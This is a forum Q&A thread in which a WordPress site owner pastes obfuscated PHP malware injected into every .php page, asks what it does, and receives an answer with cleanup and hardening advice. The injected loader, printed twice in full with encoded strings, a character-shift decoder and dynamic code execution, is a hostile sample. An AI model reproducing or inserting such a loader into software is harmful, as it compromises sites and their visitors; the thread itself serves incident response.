Malicious code not found.

8

I have a site that has been hacked (WordPress) and all the .php pages have added the following code:

<?php $ahwwxolsc = '>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf'439277~6<Cw6<pd%w6Z6<.5'hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**/#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof'57ftbc   x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT'%}X;!sp!*#opo#>)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rf   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%e]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8#-!%w:**<")));$xiaikmu = $isxgmay("", $tmoownopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?!  x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rbE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su<.[A x27&6<  x7fw6*  x7f_*#[k2'{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tsb!>!ssbnpe_GMFT'QIQ&f_UTPI'QUUI&eor_reporting(0); $tmoown]Df#<%tdz>#L4]275L3]248L3P6L1M5]1]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36-  x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  =*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]586<*id%)dfyfR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfoopdXA    x22)7gj6<*QDU'MPT7-NBFSUT'LDPT7-UFOJ%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m% x27pd%6<pd%w6Z6<.4'hA   x27pd%6<pd%w6Z6<>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w'    x5c^>Ew:Qb:Qc:W~<%h00#*<%nfd)##Qtpz)#]34if((function_exists("24<!fwbm)%tjw)bssbz)#P#-#Q::!>!    x24Ypp3)%cB%iNd); $xiaikmu();}}%:-5ppde:4:|:**#ppde#)tutjyf'4   x223}!n'hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs%!-#2#/#%#/#o]#/*)323zq%6< x7fw6*  x7f_*#fubfsdXk5'{66~6<&w6<  x7fw6*CW0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]ys%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/%  x24-    x24!>!fyqmpef)# x24*<!%t#<!%w:!>!(%w:!>!    x24676pV    x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w'TW~ x27}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x2424]y8    x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x2)zbssb!-#}#)fepmqnj!/!#0#)idub3of:opjudovg<~  x24<!%o:!>! x242178}5HB'SFTV'QUUI&b%!|!*)323zbek!~2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf'x x22l%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)usbut'c2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bwbm)%tjw)#    x24#-!#]y382400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*Kd = implode(array_map("zfkvmoa",str_split("%tjw!>!#]y84]275]y83]248]y]y74]275]y7:]268]y7f#<!%tww!>!    xuvso!%bss  x5csboe))1/35.)1/14+9**-)1/29.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs'un>qp%!|Z~!<##!>!:!}V;3q%}U;y]}R;2]},;osvuf#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd83]256]y81]265]y72]254]y763hopmA    x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@_SEEB'FUPNFS&d_SFSFGFS'QUUI&c_UOFe:55946-tr.984:75983:4!%z!>2<!gps)%j>1<%j=pd%)!gj}Z;h!opjudovg}{;#)tutjyf'opjudovg)!gj!|!*msv%#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5c+sfwjidsb'bj+upcotn+qsvmt+fmhpph#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!f2   137 x41 107 x45 116 x54"]); if ((strstr($uasx24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tus!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~92886+7**^/%rx<~!!%s:N}#sutRe%)Rd%)Rb%))!gj!<*#}+;%-qp%)54l}  x27;%]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7s}    x27;mnui}&;zepc}A;~!}   x7f;!4- x24*<!~!    x24/%t2w/   x24)##-!#~<#/.3'hA  x27pd%6<pd%w6Z6<.2'hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s*2b%)gpf{jt)!gj!<*2b#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbs+!<+{e%+*!*+fepdfe{h+{d!<b%    x7f!<X>b%Z<#opo#q%7**^#zsfvr#   x5cq%)ufttj |!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)ud]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*WsfKc#<%tpz!>!#]D6M7]K3#<%yy>#<.fmjgA   x27doj%6<   x7fw6*  x7u%-#jt0}Z;0]=]0#)2q%l}S;2-uXAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>f_*#fmjgk4'{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR27id%6<    x7fw6*  x7f_*#ujojRk3'{666~6<&w6<   x7fw6*CW&)7gj6as=strtolower($_SERVER["  x48 124 x5x22)gj6<^#Y#  x5cq%   x27Y%6<.msv'ftsbqA7>be!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y8&)7gj6<*doj%7-C)fepmqnjA    x27&6uofuopd'ufh'fmjg}[;ldpt%}K;'ufldpt}X;'msvd}R;*msv%)}.;'UQPMSVD!-id%)uq4]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267}#-!   x24/%tmw/   x24)%c*W%eN+#Qi5ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm4    120 x5f 125 x53 105 x5!~!<**qp%!-uyfu%)3of)fepdofy]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]3*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xpuft'msvd},;uqpuft'msvd}+;!>!} x27;!>>>!}_;gvcD2P4]D6#<%G]y6d]281Ld]245]K%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:ubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf'N}#QwTW%hIr   x5c1^-%r    x5c2^-%hOh/#02]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9})) { $isxgmay = "   x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x6'GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj    x6f 142 x5f 163 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5!#f6c68399#-!#65egb2dc#6-xr.985:52985-t.98]K4]65]D8]86]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212-%o:W%c:>1<%b:>1<!gps)%jqpt)%z-#:#*    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x," x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")>}R;msv}.;/#/#/},;#-4y7    x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~156 x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]=1; $u)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj8y]572]48y]#>m%:|:*r%:-t%)pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]9   157 x6e"; function zfkvmoa($n){return chr(ord($n)-1);} @err>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-busTrREvxNoiTCnuf_EtaerCxECalPer_Rtswukqhys'; $fkynbfrz=explode(chr((712-592)),substr($ahwwxolsc,(39013-33136),(126-92))); $mtsuxbm = $fkynbfrz[0]($fkynbfrz[(3-2)]); $xdyymr = $fkynbfrz[0]($fkynbfrz[(9-7)]); if (!function_exists('sopexje')) { function sopexje($hrabgt, $ufgoommd,$kdfsnldet) { $mklsjnqqyb = NULL; for($egbprqw=0;$egbprqw<(sizeof($hrabgt)/2);$egbprqw++) { $mklsjnqqyb .= substr($ufgoommd, $hrabgt[($egbprqw*2)],$hrabgt[($egbprqw*2)+(6-5)]); } return $kdfsnldet(chr((32-23)),chr((584-492)),$mklsjnqqyb); }; } $lywqws = explode(chr((291-247)),'1250,21,4997,69,5517,54,4010,35,4379,24,3002,46,5332,60,4864,68,5780,61,763,24,2274,69,2675,26,1615,23,42,21,1130,39,3327,70,2225,49,258,64,1541,43,3635,64,1019,44,4932,65,2701,60,2888,41,3502,26,4045,39,1432,47,4123,30,3778,27,3902,53,961,58,4531,35,3955,55,669,60,4153,70,4566,46,4639,38,2836,52,5571,58,2545,66,5841,36,602,67,63,64,2107,60,4730,65,492,62,3397,20,2611,64,127,64,2414,60,5692,50,2929,33,1857,30,1371,39,3183,22,3417,41,729,34,2761,33,1923,29,3481,21,3574,61,4403,27,191,67,5392,20,3205,20,3099,63,0,42,4323,56,1334,37,3458,23,2038,69,1638,55,3832,70,1952,64,2016,22,2474,26,3262,30,3528,46,3805,27,1410,22,4084,39,4223,70,2343,32,2189,36,1063,67,911,50,4430,59,5629,26,1887,36,1753,44,873,38,3048,51,5275,57,1797,60,5412,47,3292,35,1584,31,1297,20,4293,30,322,57,5655,37,5134,23,4489,42,554,48,4795,34,1479,62,5066,68,5157,31,3225,37,2794,22,5742,38,3751,27,379,68,787,32,4612,27,4829,35,5459,58,1226,24,819,54,5188,63,3699,52,2375,39,3162,21,5251,24,4677,53,1169,57,2816,20,1693,60,1271,26,2500,45,2962,40,2167,22,447,45,1317,17'); $xxnkkc = $mtsuxbm("",sopexje($lywqws,$ahwwxolsc,$xdyymr)); $mtsuxbm=$ahwwxolsc; $xxnkkc(""); $xxnkkc=(697-576); $ahwwxolsc=$xxnkkc-1; ?>

I wanted to know what this could actually have done on my site and if there is any way to clean it since the code is the same.

Thanks.

I've arranged the code to make it easier to understand, as follows:

<?php $ahwwxolsc = '>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf'439277~6<Cw6<pd%w6Z6<.5'hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**/#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof'57ftbc   x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT'%}X;!sp!*#opo#>)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rf   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%e]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8#-!%w:**<")));$xiaikmu = $isxgmay("", $tmoownopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?!  x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rbE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su<.[A x27&6<  x7fw6*  x7f_*#[k2'{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tsb!>!ssbnpe_GMFT'QIQ&f_UTPI'QUUI&eor_reporting(0); $tmoown]Df#<%tdz>#L4]275L3]248L3P6L1M5]1]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36-  x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  =*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]586<*id%)dfyfR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfoopdXA    x22)7gj6<*QDU'MPT7-NBFSUT'LDPT7-UFOJ%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m% x27pd%6<pd%w6Z6<.4'hA   x27pd%6<pd%w6Z6<>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w'    x5c^>Ew:Qb:Qc:W~<%h00#*<%nfd)##Qtpz)#]34if((function_exists("24<!fwbm)%tjw)bssbz)#P#-#Q::!>!    x24Ypp3)%cB%iNd); $xiaikmu();}}%:-5ppde:4:|:**#ppde#)tutjyf'4   x223}!n'hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs%!-#2#/#%#/#o]#/*)323zq%6< x7fw6*  x7f_*#fubfsdXk5'{66~6<&w6<  x7fw6*CW0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]ys%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/%  x24-    x24!>!fyqmpef)# x24*<!%t#<!%w:!>!(%w:!>!    x24676pV    x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w'TW~ x27}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x2424]y8    x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x2)zbssb!-#}#)fepmqnj!/!#0#)idub3of:opjudovg<~  x24<!%o:!>! x242178}5HB'SFTV'QUUI&b%!|!*)323zbek!~2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf'x x22l%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)usbut'c2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bwbm)%tjw)#    x24#-!#]y382400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*Kd = implode(array_map("zfkvmoa",str_split("%tjw!>!#]y84]275]y83]248]y]y74]275]y7:]268]y7f#<!%tww!>!    xuvso!%bss  x5csboe))1/35.)1/14+9**-)1/29.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs'un>qp%!|Z~!<##!>!:!}V;3q%}U;y]}R;2]},;osvuf#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd83]256]y81]265]y72]254]y763hopmA    x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@_SEEB'FUPNFS&d_SFSFGFS'QUUI&c_UOFe:55946-tr.984:75983:4!%z!>2<!gps)%j>1<%j=pd%)!gj}Z;h!opjudovg}{;#)tutjyf'opjudovg)!gj!|!*msv%#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5c+sfwjidsb'bj+upcotn+qsvmt+fmhpph#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!f2   137 x41 107 x45 116 x54"]); if ((strstr($uasx24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tus!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~92886+7**^/%rx<~!!%s:N}#sutRe%)Rd%)Rb%))!gj!<*#}+;%-qp%)54l}  x27;%]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7s}    x27;mnui}&;zepc}A;~!}   x7f;!4- x24*<!~!    x24/%t2w/   x24)##-!#~<#/.3'hA  x27pd%6<pd%w6Z6<.2'hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s*2b%)gpf{jt)!gj!<*2b#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbs+!<+{e%+*!*+fepdfe{h+{d!<b%    x7f!<X>b%Z<#opo#q%7**^#zsfvr#   x5cq%)ufttj |!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)ud]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*WsfKc#<%tpz!>!#]D6M7]K3#<%yy>#<.fmjgA   x27doj%6<   x7fw6*  x7u%-#jt0}Z;0]=]0#)2q%l}S;2-uXAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>f_*#fmjgk4'{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR27id%6<    x7fw6*  x7f_*#ujojRk3'{666~6<&w6<   x7fw6*CW&)7gj6as=strtolower($_SERVER["  x48 124 x5x22)gj6<^#Y#  x5cq%   x27Y%6<.msv'ftsbqA7>be!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y8&)7gj6<*doj%7-C)fepmqnjA    x27&6uofuopd'ufh'fmjg}[;ldpt%}K;'ufldpt}X;'msvd}R;*msv%)}.;'UQPMSVD!-id%)uq4]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267}#-!   x24/%tmw/   x24)%c*W%eN+#Qi5ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm4    120 x5f 125 x53 105 x5!~!<**qp%!-uyfu%)3of)fepdofy]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]3*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xpuft'msvd},;uqpuft'msvd}+;!>!} x27;!>>>!}_;gvcD2P4]D6#<%G]y6d]281Ld]245]K%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:ubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf'N}#QwTW%hIr   x5c1^-%r    x5c2^-%hOh/#02]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9})) { $isxgmay = "   x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x6'GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj    x6f 142 x5f 163 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5!#f6c68399#-!#65egb2dc#6-xr.985:52985-t.98]K4]65]D8]86]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212-%o:W%c:>1<%b:>1<!gps)%jqpt)%z-#:#*    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x," x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")>}R;msv}.;/#/#/},;#-4y7    x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~156 x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]=1; $u)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj8y]572]48y]#>m%:|:*r%:-t%)pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]9   157 x6e"; function zfkvmoa($n){return chr(ord($n)-1);} @err>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-busTrREvxNoiTCnuf_EtaerCxECalPer_Rtswukqhys';
$fkynbfrz = explode(chr((712 - 592)), substr($ahwwxolsc, (39013 - 33136), (126 - 92)));
$mtsuxbm = $fkynbfrz[0]($fkynbfrz[(3 - 2) ]);
$xdyymr = $fkynbfrz[0]($fkynbfrz[(9 - 7) ]);
if (!function_exists('sopexje')) {
    function sopexje($hrabgt, $ufgoommd, $kdfsnldet) {
        $mklsjnqqyb = NULL;
        for ($egbprqw = 0;$egbprqw < (sizeof($hrabgt) / 2);$egbprqw++) {
            $mklsjnqqyb.= substr($ufgoommd, $hrabgt[($egbprqw * 2) ], $hrabgt[($egbprqw * 2) + (6 - 5) ]);
        }
        return $kdfsnldet(chr((32 - 23)), chr((584 - 492)), $mklsjnqqyb);
    };
}
$lywqws = explode(chr((291 - 247)), '1250,21,4997,69,5517,54,4010,35,4379,24,3002,46,5332,60,4864,68,5780,61,763,24,2274,69,2675,26,1615,23,42,21,1130,39,3327,70,2225,49,258,64,1541,43,3635,64,1019,44,4932,65,2701,60,2888,41,3502,26,4045,39,1432,47,4123,30,3778,27,3902,53,961,58,4531,35,3955,55,669,60,4153,70,4566,46,4639,38,2836,52,5571,58,2545,66,5841,36,602,67,63,64,2107,60,4730,65,492,62,3397,20,2611,64,127,64,2414,60,5692,50,2929,33,1857,30,1371,39,3183,22,3417,41,729,34,2761,33,1923,29,3481,21,3574,61,4403,27,191,67,5392,20,3205,20,3099,63,0,42,4323,56,1334,37,3458,23,2038,69,1638,55,3832,70,1952,64,2016,22,2474,26,3262,30,3528,46,3805,27,1410,22,4084,39,4223,70,2343,32,2189,36,1063,67,911,50,4430,59,5629,26,1887,36,1753,44,873,38,3048,51,5275,57,1797,60,5412,47,3292,35,1584,31,1297,20,4293,30,322,57,5655,37,5134,23,4489,42,554,48,4795,34,1479,62,5066,68,5157,31,3225,37,2794,22,5742,38,3751,27,379,68,787,32,4612,27,4829,35,5459,58,1226,24,819,54,5188,63,3699,52,2375,39,3162,21,5251,24,4677,53,1169,57,2816,20,1693,60,1271,26,2500,45,2962,40,2167,22,447,45,1317,17');
$xxnkkc = $mtsuxbm("", sopexje($lywqws, $ahwwxolsc, $xdyymr));
$mtsuxbm = $ahwwxolsc;
$xxnkkc("");
$xxnkkc = (697 - 576);
$ahwwxolsc = $xxnkkc - 1; ?>
    
asked by anonymous 11.05.2016 / 17:27

1 answer

3

In most cases, this type of "intrusion" happens due to outdated plugins, outdated version of the core or even use of already infected themes. It happens a lot, you sometimes want to have a premium theme but you do not want to pay for the service, so run into any blog or torrent around and download the "free" theme ... but do not check the scripts and fall into a real trap. I say this because I was already a victim.

First step is to clear your code. You can simply re-upload source code (WP's original source) or go through file-by-file browsing for malicious entries like these. Not too difficult, they usually follow a pattern. Notepad ++ will be your hero if that is the case.

Step two is to prevent this from happening again. Change your passwords, change the hash keys. Do not use these pirate themes, do not install any kind of plugin and ALWAYS keep everything updated as much as possible.

An alternative that helped me a lot was to use some security plugins, such as Wordfence (free) or Sitelock (paid) for example. It will be monitoring your files and comparing if your code has undergone a change that leaves it different from the original source, it gives you resources to compare, eliminate and get rid of that kind of thing. There are several tools of this type in the market, free and paid, there goes according to your need.

And finally, by answering your final question, "What could this have done on your site?" At best, nothing! At worst they may have used your site to send spam, you may have fallen into a blacklist and they may have had access to your data in some way, since they have been able to edit your source, it may be that, depending on their permissions, they may have access to wp-config. But this is hard to say without broader access.

    
19.05.2016 / 22:34